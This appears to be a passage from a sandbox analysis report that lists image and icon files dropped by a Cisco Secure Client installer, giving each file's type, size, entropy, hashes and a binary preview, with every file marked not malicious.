                                                                                                                                      Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-AI3OO.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2274
                                                                                                                                      Entropy (8bit):7.88487369762579
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ANENb8K8isarhoHup4l7Hn5MPuvW5LApZJ+WoXY:Bbx3rGHupubC6NpzSXY
                                                                                                                                      MD5:02AA7BFBC5519A9410E0D27732A6A163
                                                                                                                                      SHA1:9DDE546C6090CA4BD8BE58F8625A6AE25D440E6E
                                                                                                                                      SHA-256:B08A8AE17D62E9CF9D6E91E59955AF91E1B126FD82BC1071BDAFEE8AB6818253
                                                                                                                                      SHA-512:323777E1ABC44F643AD6AE581970D551D6BB94DF485377E91DB411ED8B839C47F8490002DF9756AD340BC19D8676050A620A1008F211B3AC32C39BE37CD35093
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx...LUe....]i...%L.......^....#.J[6...[.Q.....2.0.p...sT...o.c.n..dE[N/E.9..H..k.....{..s.....wc.{.=?..}..}..}.3....jK#.d"......&"......ug.|b......".&.,"J..[.x..&.J$s....]=t..*........TMDU.G.5=._.@&...........c[|V..v...|3..3.......,...`vp0.@.H...e.`V..`]..g.^sN........ o0..-.gQFz........J..+j.*h@&...T@D...k.zwl1Z.t.......r.U.. n5..5p..{..f1r.E.=P"\..6.jM..2Ym.....u.V..=[)&:*."i...^.{.(U.:C.V..uMjo........N.DG..9.......?.4,....)cy*..H5?]..s..5.lm.w:TAR...)M...YV.GK...<.....|.".p.%.....f.u5............Rr..y.}..DL*Sr.".z...w....n..d...8B.@...xmU.4+...J.n............(KQ~...,.L....>..LV..9....[..../.G.T..(..>4(7...xGw........h.....X.....{..V-@B.../..y..1..W.d. nn...&....~...*S`....k...@k{.w.dP-.n....Z.(...=.:...N..#\......-~......0..;...K. .'....;..|J.n.d.t...A_O)d..g r...w-...e........@5.d.v...........e.y-....3\.......H..[.g.roI.=.(B...\.d.....jh..K..S.].......Xf...jC....ol...2

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-BE82B.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1807
                                                                                                                                      Entropy (8bit):7.846793911413473
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:M3uM24lXN+maawwFvEk9PMjKHcdAJ5xo+n7R/0+5GpxwGjQaTNn7ohEoGCL5F2lr:M+VU3vVsk9kcqE7RN+x/BohRnG
                                                                                                                                      MD5:536C911881523B9F8402A481881992A0
                                                                                                                                      SHA1:2748A03D65DA7D6B4A95ACBDEB6ECD6F409A0ABF
                                                                                                                                      SHA-256:246B7E52A41AA64365D84C7DA73FD20C27B8C825C61394AE8C775DBD9BF5B668
                                                                                                                                      SHA-512:608DFEC9C7980707B9947F3CFB8BEF93FDF1D6D5B908E25888BCA0C7CE83C70F23AF87798F38E364E75FA05C89523028B5742E3084E6401068A7DE6BC5BF90E4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..;R#I..k.........1...h.@'..:.V...1'.q..kM...Ly..h..6J.=....Y.%E~...!..wVe... .. .. .. ....O;....I..UO...........R.........7...E)5W.d...Q.)J5.7\{....Q.W.P.R.a.@.*K......ab...Q.d..zV....^..m.C.t..U.Y.e..(.....x.J)...s.....)..XM....Y.._~Q......o#..........=.p+b.E..X..X.}.'..o...DJw..GJq.].^.%R.#..3.y<.s...5.......s.s....;>.Z.q.F./..r.Z...T..=.&H......z...~J/.%.....(.~.|R7...z.LV....+.........T....|L.1i<..Zc.]LO.;.@.:.?IU./..A.,.-.rGr!Z...'I.........6+^......a....n6~e6ejy.f.........\UC..\..i..s.r.U_.i..>......u...p...zb5..t|u.h.*gxD..}6T[i.jxO./..goc...9......(.[..........*.{.8.f.(..R..J8.za.;.t..aj./.5.^px....g[...]z...=.Q.Q.%.D...z2`.;.6.K9.26Tc'....)_...$..<.&.7v.....pQ..N....s.c...XX..x.>..O.....)&/IYm..=....7.A.......c$..R....T{.q......C..@.L.....]({..>y.:.e.#....ym.....g^.R.....v.$.M.B.E....^.xSF80......n|Ph./..%<.I...X.f..=.pz..~...a..O1.9g.m.Mp....n.v%D....w....F6.....{.".!.~.}..}.P.S.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-C7K2J.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):417
                                                                                                                                      Entropy (8bit):7.261808950496785
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7ye/67M2KK09AtPNFPQM7vcvei4A62GCv+OQRWqxEz:de/YM2KYBTcKA62VWvE
                                                                                                                                      MD5:E49813F0A990FD98318710C0F0BFDA21
                                                                                                                                      SHA1:FD09D47A8BA649393221D5048D3BFF1FFADD3496
                                                                                                                                      SHA-256:79C957FB0133496B0266E8F5441982D3F1DAB781B90FBC34F59D75968577CD61
                                                                                                                                      SHA-512:8883387871CBE8B3778F5D95A95700D99B7D4737696051436C06060C645F83E25255A76AA73CD5BA1B03FC5797D8F6B99D1B0E489B5421D26D4E7DBFD358EA65
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~....SIDATH..U.Q.0.}e.. ...............N@..3I.A.!.../.......r......SXTW.t..3.n..g.....!/k.t..{....=.^.+E.U..KD.@..@..)..sV...7u..[!_+..F.......#.......?$....3.t....;8.D...N.pv.H...Q\r.....T.t..t..F......~....1a3g......Y..L.#.F%..-.(.o...bl.}..=...T.d2.[.x".m..b.V*./........T...(..+.>[F5....7..j..2:....-;.....P.w|j..d.s.........&.cO........IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-D0PAL.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):9736
                                                                                                                                      Entropy (8bit):7.95835565935799
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uGw9FbNic2CTLMZgb0OeuEqR0+zipNb19+MUs2b4uLbFv7MLlELHz5FijB:uZ95jOAdE+0+mpNB9dObfR4LiLHz5QjB
                                                                                                                                      MD5:64C1592AB32B98889AFDB7F216B3A535
                                                                                                                                      SHA1:9DA1BF63D0E9CCF65BA0C72E615099AD30DDB2EB
                                                                                                                                      SHA-256:B649B2B24F635758C6B424EBADA07097ABB56CE73E46F056268004D79575AA8F
                                                                                                                                      SHA-512:CA8376AEB64FE49CE253BEE7F949AEBFDB6C1EAD6270C739B09751CEEA313407F7AABBA7388E4ABFA53A48A322D827EF6D4FF1D458C3FB815239407646D53C84
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx......}....j'.b.*A...H.8B.p....IXM.Q....db..D...!.*#aI..J.h..M"k?...k..t.......+!j...T7.N.y9.r........o..e......{.....?...B..\i...... ........T...u ~.h...J.4..%"..k.^...O.....".....v...+7...........M....J.z....E..(...0M+.S.R"._.2.Y..h...J.+J.+.*.@..-5....T.......E+.4WZG)q.H...k.]..|C...*,.P.O9.72{.......]y.....}J.:Dd;C.|@..8J.....rEh.......c..|?......A.D}....J.[...<E.C)y.....J.A.. i...&8.3y...t.x.9bx .6......W..&......zV^9......e..VFPA..$..b...4q.L...&..R.....7.....aK..A...........6%V....=A.f.2$Ve.ue={.8....#.....7..V.P..FE9..#> ..OuDj...ME......*....+](Z).\i]...H#....>E....N**pb..>+;....X.....z6...E+aT..L.U.."5..YtS...l[....'..u..qsV.k..h%DM..(l...u.5.e.YN.H.'&.C......Qbu.....EA.....l......!.Um......Q....n.b.*.l{t.<.+l..B{.W.P.".E..V,..._.@....... X.Y6F......}i..j.rUY.@'v \k7<.&.b....V..+....-Vn..g..X.d\.ak..K...U.@...ZToS...........,8np.....l..G.P.|.r.MA.B)V..."....

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-D9LFD.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2860
                                                                                                                                      Entropy (8bit):7.914852791051157
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:1vgVWGnIUiSbzr6C6bm/8B3fMKfxYtg+hRKdQr5iQGAOUnonGVY5Q14pUcblw/Gu:1YIUxbavbmUZxYtVXABUno7Q5cblwDSI
                                                                                                                                      MD5:DA68BAC3A525CC1ACE0BC4836A49D3D5
                                                                                                                                      SHA1:5C7D343913F75C7595BBA487031056B54F2AC6CE
                                                                                                                                      SHA-256:DC088A5CD630537A875466B7278DDDE0E54203C733D0950F67B0D3896B671A09
                                                                                                                                      SHA-512:A5F4BCC1A2CADF82927CEBD0373694086BDF955D7B755118255AAE3FA7CF7EB05748C81B35A759A8202991B2B2D5F77709FC84C58D0554430BE3AE8B51519264
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..\.L......E.ki....`S.uB&HRP......E7.5.f.K.t.e....lV..ve.M'..@..."..t).U.R.(r@I....^.......;...._B.......w..{..y...Q.a.df......G3.T......&.....`.q..2Z2..h3...Q.....d..*q..b..?.9}......6...I5DT.7u....B..i...._.........\.>..........U..r.=.]....rb. !'{-m...DO..N.\....,.'.TO.t!..X...(';]......KT.N.pE]..1AFK&\.(.%.....!iK...^;V%..6.u..CB...Jh.\....f1...*.........&..2Z2!..`5.r7.+.wSlL....?.......N..@..8.M6..2h=.h..ID.bc...YRD?}....4...O.=.O..I+.....sd..d.=.o.D.&.89...WD.,=H..)z.'`...xZ.n...vD....l0Ynj!.g...C.9qd..7.....D..M:..y>Y......9.I..i.$..=....C.G..lu.....L..u.`..b.{=>Xp#).`....o.]^U.x.s56&:....*..w..rI0W'...C{uO7f.h.4i`p.!..jqR..k .L.:0\.=.n.7#K0C.U.K...X...b<}x.A .._....?.*.=..a.n....o..v=.N..9jQ.C.....kJ2.,....?v?f.A.../^h.,=.).Df.P..p....$..{Dz...C:v..t.......[G.a..>3.R...=..Z....X....}%.CV...J....p.6<......}v....T..3.5._].....c.V.~..A.z.....x./^..q....?.......9 ....5.?.Xy...s ..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-DDE2I.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 375 x 23, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):700
                                                                                                                                      Entropy (8bit):6.305816801627044
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7B0J+UJbp92cDPuY1qHlnv/pebLaeb9Lf43DQ6TjpuIXG13DQ6i5t2c:0erLYWuqylnv/pe3aO9KDUIXO3D+/
                                                                                                                                      MD5:894AB8F4298F2238292E31BAB5CCAB10
                                                                                                                                      SHA1:FCFC29B4E5BAC3C59EDA1F8837087E768F7B0A7B
                                                                                                                                      SHA-256:7C8B5EC8C7DE5405AAEE5B1E92C605020424AED8AF830C2429ED47883561A39D
                                                                                                                                      SHA-512:B7F06E961C2C2BAC0EFC5633E213D90E3206093593988BD04CE84DA13B1D1B4F0B83DEB77FF247E6681A645004FD37C2866FF83EB7A6A5E3E581B0868AB58C3E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...w..........C......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>.L.'Y....IDATx...... ..A.............. @.@J...C...._..+.......=.T... `.u....A...|.H...0.:@.....q.>U$....w. @.@P....*........ @ (`.O......]... ..0....D.............SE"@..q........{.". @..........=.T... `.u....A...|.H...0.:@............X~....IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-F6QQ6.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1260x1024, components 3
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):399779
                                                                                                                                      Entropy (8bit):7.9639437199622165
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:NZGJOTaTKegfZjGiFfyHLyforThgWTZcWX1nQ8WMsETaVovwV:/JT6g5JyjrThgWTZvQ8lsvVnV
                                                                                                                                      MD5:DF0BDC3CDA98B3BE333FEB2A2770002C
                                                                                                                                      SHA1:D0FED726183EBEA0B535EE06A66805E7BF3C9386
                                                                                                                                      SHA-256:FD3413367D94F80DC520390C0971F9AA44003C9C6F32BCBC3303A6682D0B0175
                                                                                                                                      SHA-512:46F9DA519D7D8E1D192D9EB6082FBEAAE164EC58C97C22BB576B8DEEC387B57FFC8CF8BF75412C8FD2B30B9962B96070A679F2E26558099B5DB4411A59E0386D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......JFIF.....H.H.....,Photoshop 3.0.8BIM.........H.......H........D.http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpGImg="http://ns.adobe.com/xap/1.0/g/img/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:illustrator="http://ns.adobe.com/illustrator/1.0/". xmlns:pdf="http://ns.adobe.com/pdf/1.3/">. <dc:format>image/jpeg</dc:format>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang="x-default">Ba

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-FLDF3.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):31702
                                                                                                                                      Entropy (8bit):7.968827949628217
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:j9rxAm3IyJR5xmDQXMUg0HvpXOQFvgMN/2iHxr:j5X5AVUjEQ9NVRr
                                                                                                                                      MD5:D7A6605937F7BE6861ED243FEED7B2AF
                                                                                                                                      SHA1:CE9EFBCE4C470923C242615A0B53E775800BB031
                                                                                                                                      SHA-256:331F0FB3EAA0F38927DD0B350A6D92B8E18ACFDF64CBC597B470EF6E4D055C81
                                                                                                                                      SHA-512:A9C1C5503D9987245389C762ECDA0F4803BD84CC3D47534731F9194BB33DF93C7FEA6569D6E0BE03C4A59551B4F8021AA129A38FFF653FEB81B5DBF065438FCF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx...l]...2j...J.H......vf2e..8....Tu.4j...p50E...P.8.+.k.. Z..%.F...#..5..SR'.B{....d:p.;.7P.Nf*........d.}..g.[k....#.....g.....%H...!..~.T.^...'&&..2>>./...A......e.EX....v....e...nb.....E..(}yO......O.ttt.:...8...%k...rW.....h$..^.L..<..5.V..{..7...,.#..r..x...$...$..H|!...A.^.4.$..Ht!t_. I.J....bXy!$E].$...(."..X.B<..c....i7...p!.....X.s.\..^...............~....>.6^..8;...D..>./.hs.Q..u1f..hii)...I......q.....8s..F...0..i+\x<...A..22lZ..&x....y%\.....7..b.iTH...z..1....G.$........1a.d..b..Kvh...V...*<"*1.lG..p..?.B....)q...q.'o..6mJ..G.y.....=.....1...R.8.....3..7.tc..l...../....L...Fs?&Q....G?J}PI~.v!.......Cm..P.;....T..=....%.....*...^.s...~x.~....}.5.\...o..}]..s.....2......?...-?....tDW(.b.K.X.o.........;.w...w.........\..0.o..N.......^...7..........d..].........{....+..o...... '...).....]..n.G...+....Q...IvB.......x..y...^..3.sm..I...Hb.]g..-.g ..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-FVD3L.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1577
                                                                                                                                      Entropy (8bit):5.942243839150427
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNA6h+REMmcI1VCnw7Pl3Vv7aHH3yGNbBg:g/6G6GknA9Wg26x/c0eG3tmHiGg
                                                                                                                                      MD5:8675E6CF868FCE7270D170D83CE58757
                                                                                                                                      SHA1:B08567ACEF2380521759E4A1C12B1C9FE657ABED
                                                                                                                                      SHA-256:593A68E8FC7ADF787E5728D044AC71D4A9BEC6E4A6BF15895ABC8C4869F33625
                                                                                                                                      SHA-512:6480B3304656ECA345326A96FEF93B653B9F40550E5B0D14498B2670BAFB497E78A2517911F8E791E1DEC3C9A3070CB4212DB727FBE3FC648F6100E5EF349B2F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:31:46-04:00" xmp:ModifyDate="2018-10-19T17:56:14-04:00" xmp:MetadataDate="2018-10-19T17:56:14-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:1181fb18-be64-4155-ab97-06d5464c99e6" xmpMM:DocumentID="xmp.did:1181fb18-be64-4155-ab97-06d5464c99e6"

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-G21PH.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.7071518309363354
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:rtQAZDlpb/oRjRgvFBvOcVYVWZahUNZGIJMWz6izv2dBtj33xNCpK0v6wxrf0Dgk:rt/Md6vFBXKWIhUNky4X3IrvX1sDgro
                                                                                                                                      MD5:1C98B43E6778943A5358BE61A90BA74C
                                                                                                                                      SHA1:5267802FF8108EA1709CFEB6C156A7AA5D6140BC
                                                                                                                                      SHA-256:BCE250F3AEA36B7A76C5D4D73B03CE83A7988BBFB6F6AA69C92475C39DABC22E
                                                                                                                                      SHA-512:7C10E7FE2D1A476D0A923937597B95D505FBE6978ED4518A99F1FC391CB6281CE8A0F94F3772C83ABAEF916B6834BB5490833BF60BB3B9FA67D61CA0B7C16015
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................P..........!...................................................................!.................................... .....................,3..................................................................#,.............................................kY.M'..M'.. *%..5C..........................-9..-9..........................(2..0;u.......................0............cB+.M'..M'..M'..X5..z]J......y.......................1=..1=......................[q...'........................0.........xh.M'..M'..X5........................#......................................................DU*................... ........nP:.M'..M'....w..........................,0..az...................'...'..................7F..9G.............................z]J.M'..X5..............................................................................|....#.................................M'..X5

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-G4U2D.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10239
                                                                                                                                      Entropy (8bit):7.950564187811269
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uTeKIu+Nxu1/eEefaoIgGSw78i5GJssnezz3Gu5cMrvF6AO:uTeg+NkdeCodGSiV3dcI96AO
                                                                                                                                      MD5:7DADB01AC22B7AB6F313726AD5977675
                                                                                                                                      SHA1:274554CDEB3971D3A9250AA0A7597F8B41D17000
                                                                                                                                      SHA-256:EBBA9313774314E18ABB4F4342B1C0C93DF22DD45146C6E84A08EB39BD419825
                                                                                                                                      SHA-512:C77FA7F8791A4852DBA2C9402D705E6C4CDB92DAAF71CD5F46EA8AD6EA35E41D4CFF42296C2F08133A82AE1F31DCA05C61B29AC291F85BBE4C7FDF088A4F0866
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....U.._l.eK.ImJ\.7`vV...R..t..P3.L...N.DZ..R........!8...`..$.dqj..j..-.a.C.....+...WB)S.tc..N.j..xOs.>...|....UT7....s.......c.!.Q_j.!.......rw..5.....E}.q...R..V.N'Na..@...-...y.`......h..)LS.........J!.....V<(Z9...8E:...-.B.'z.?..1.>X../.k.W(Z9C:.y.=.0.s._.K..#...-........_.0..1...P..C.{-R.Z.~>j.O.X..1...@.r.YJ.....Q.._/......7M..o.4|....J&.t.w. .9sV.|..kz^?5.....K.....D......Q.fd..VFIJ. >..;..".$EG'>I...m..=....E...<...?..e..V..S.|1.3s........K@. ^.w...../`..Bf..V......\....f.w.............).'..!G!`...8......r..!)X5..l.....N%.>.T.x.mq..).E$bp\.....>&.E+A*\..Z.?8.E.g.93.....v.T...I...XGW.'j5rL...WBP..@.)l.....=..=......{q...|.Gtv.Vkr..k7s_.C.............i.l....B.#./.*`.....1.(Z1 .jK...tT....._.%.D....W.P.".....z..X.^..7:.z..W..UB...V.."V~..."..!.s/..9.*.G.W.P.j.Z...B...5K..9.\.........}.P...b50T...j.f.U1.....s..}.._.J<^.s...V.d.U..,k VpU..............M..I.u.......%

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-HD13A.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2245
                                                                                                                                      Entropy (8bit):7.881067272381913
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:RTfEfdH62oMLD03CqIngSp9wZM/vgRzmD0XQ8/CvbJkfG2:RwfYHt6qKmzmD0g8/Cv9kfG2
                                                                                                                                      MD5:FC4A9201524066297A4C6DD0760D646C
                                                                                                                                      SHA1:7B6B7710A1B9EEDAC515FEEE90728A405AC07937
                                                                                                                                      SHA-256:B19294D4FF3378820B91BF8D2DBC53CB9C8BB531A5CA7E0F4C728AC757C0CD29
                                                                                                                                      SHA-512:2597C04C2740000747731CB3FF55E7C15675D86578CD0FC73A8F04D84CD084142BF0BFAE55DD81B6AFA1CDE2585EEF233B9BBAB1C05655B3099FA1BBFAECD3DD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v...wIDATx..].R#9..w../..2.c.+..'....O.s..X...y......oD.s....g........nukZ.xo.*.,..f>...[..0`.......0.....y.bvh.9q.w.k....}_.cj.....1f....e...._R..}...1g...W.X.,9_L9/.>D..E..qi.3..&....h..C.....)....3.RI.aU.%...U.qd$..Yu..#CK5i..s...<..3K.u...F.r.R....V.c........>..3)j..>uhC.4....v.J.jm..c.L9.......8..WA.....x....j....3..:....>.c...95.|.eL.qI...V0+..'.l|.........0.. .)..V...z;..M";q.c....bv.T.K.....Fr...];bT%[...!.#..a.5..P..]Rx.X....Q.>1.F..=Rx.,L9.........ck,1G...'....#d...X@....w...'g.:.;)..S..vo..A...#..yo..M}A..+!.Q....h'....$<y..N...|..n..!.R......_.Y...1.C'G8)~.D.....H..-Pu......6N.>..0R.j....qP...../.9.]r..........."...<Cv.3r.(.W(.B$......N.....{I.R..Fok.b.-Pq_.$`*q...A.KLu......8.....x..=.?...).t....PyD.0.*m.........n.`/......zd^....I%...4.^.4C..!/w......l.HZ..l...T.>...KgH.5...}..+.6F.i....*.4.6%.....A;8`6q...Z].av....]']v.....W........L.W.R.MK..?%^R..RcL.3._#...G...1.{..0F %.h3....k.B.>r

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-HMT20.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):51094
                                                                                                                                      Entropy (8bit):7.977081753425093
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:UoAL5K723jk6waeSXMFYcQotAtZJqyGlOk6bAfb1:Uv5YAjkCeS8u6tAnwwTbe1
                                                                                                                                      MD5:BBD0533637DA4102A6DC250FB20D6FA7
                                                                                                                                      SHA1:B78DC64053313A61F3C25550D17C2700923B1EF0
                                                                                                                                      SHA-256:C4D28DB251B9D72B2EF84EB9774F028FFDB65E432451E79E50D51A497D8196B9
